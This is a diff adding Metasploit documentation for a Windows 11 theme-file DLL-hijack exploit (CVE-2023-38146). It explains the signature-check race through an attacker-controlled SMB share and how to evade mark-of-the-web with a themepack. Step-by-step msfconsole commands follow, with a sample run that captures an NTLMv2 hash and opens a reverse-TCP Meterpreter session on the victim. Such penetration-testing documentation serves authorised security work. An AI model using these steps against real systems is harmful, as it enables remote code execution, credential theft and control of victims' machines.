diff --git a/documentation/modules/exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146.md b/documentation/modules/exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146.md new file mode 100644 index 000000000000..11690d31fe0e --- /dev/null +++ b/documentation/modules/exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146.md @@ -0,0 +1,121 @@ +## Description + +There exists a time of check to time of use vulnerability in the way Windows 11 loads msstyles files when they are +via a theme file. When a user opens a theme which references an msstyles file with a `PACKME_VERSION` +of 999, the process will check for the presence of the msstyles file appended with "_vrf.dll". If the file is found, +the process will open the file to check for a signature. If the signature is valid, the process closes the file and +then loads it. By closing the file after the check and before loading it, we can feed a legitimate signed dll to the +check read, and then substitute a malicious dll for the second, resulting in the process loading our dll and executing +arbitrary code. + +To achieve this race condition, we implement a UNC path pointing back to an SMB server we control that uses the type +of request issued by the SMB client to decide to server the legitimate file or the payload file. + +Because the PACKME_VERSION must be 999, this module includes a tool to take a normal windows aero.msstyles file +and populate it with the required PACKME_VERSION. As the aero.msstyles file is also a signed binary, we can use it +as both the msstyles file and the legitimate signed dll file. + +As a final step, a user may convert the resultant theme file into a themepack file by using the linux command +`lcab exploit.theme exploit.themepack` +By converting this into a themepack file rather than a theme file, it circumvents the "mark of the web" and will no +longer result in a security warning dialog box before opening. + +## Vulnerable Application + +Windows 11 + +## Verification Steps + +1. `./msfconsole` +2. `set payload windows/x64/meterpreter_reverse_tcp` +3. `set LHOST ` +4. `set LPORT ` +5. `set STYLE_FILE` +6. `set DisablePayloadhandler false` +7. `run` +8. [OPTIONAL] Convert the theme file to a themepack file with the Linux command `lcab exploit.theme exploit.themepack` +9. Copy theme or themepack file over to target. + +## Scenarios + +### Windows 11 + +``` +msf6 > use exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146 +[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options + +Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SHARE no Share (Default Random) + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the loc + al machine or 0.0.0.0 to listen on all addresses. + SRVPORT 445 yes The local port to listen on. + STYLE_FILE yes The Microsoft-signed .msstyles file (e.g. aero.msstyles). + STYLE_FILE_NAME yes The name of the style file to reference. + THEME_FILE_NAME exploit.theme yes The name of the theme file to generate. + + +Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 10.5.135.201 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows + + + +View the full module info with the info, or info -d command. + +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set SRVHOST 10.5.135.201 +SRVHOST => 10.5.135.201 +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE '/home/tmoose/rapid7/metasploit-framework/aero.msstyles' +STYLE_FILE => /home/tmoose/rapid7/metasploit-framework/aero.msstyles +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE_NAME aero +STYLE_FILE_NAME => aero +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set verbose true +verbose => true +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > +[*] Started reverse TCP handler on 10.5.135.201:4444 +[*] Server is running. Listening on 10.5.135.201:445 +[*] Server started. +[+] exploit.theme stored at /home/tmoose/.msf4/local/exploit.theme +[*] Received SMB connection from 10.5.132.136 +[SMB] NTLMv2-SSP Client : 10.5.132.136 +[SMB] NTLMv2-SSP Username : .\msfuser +[SMB] NTLMv2-SSP Hash : msfuser::.:571cefb4150fb5f1:059699f9eee7e044d95167c03c58c6b4:010100000000000000326d46a633da013654631d1e8ef262000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080000326d46a633da0106000400020000000800300030000000000000000100000000200000fe746065d66cc1efc7756d546af110124dd7d6b60126a5edff7b41cce14019d90a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000 + +[*] Sending file to 10.5.132.136 +[*] Sending stage (200774 bytes) to 10.5.132.136 +[*] Server stopped. +[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.136:50003) at 2023-12-20 18:40:25 -0600 + +msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > sessions -i -1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : DESKTOP-7M0LC28 +OS : Windows 11 (10.0 Build 22000). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > getuid +Server username: DESKTOP-7M0LC28\msfuser +meterpreter > + +```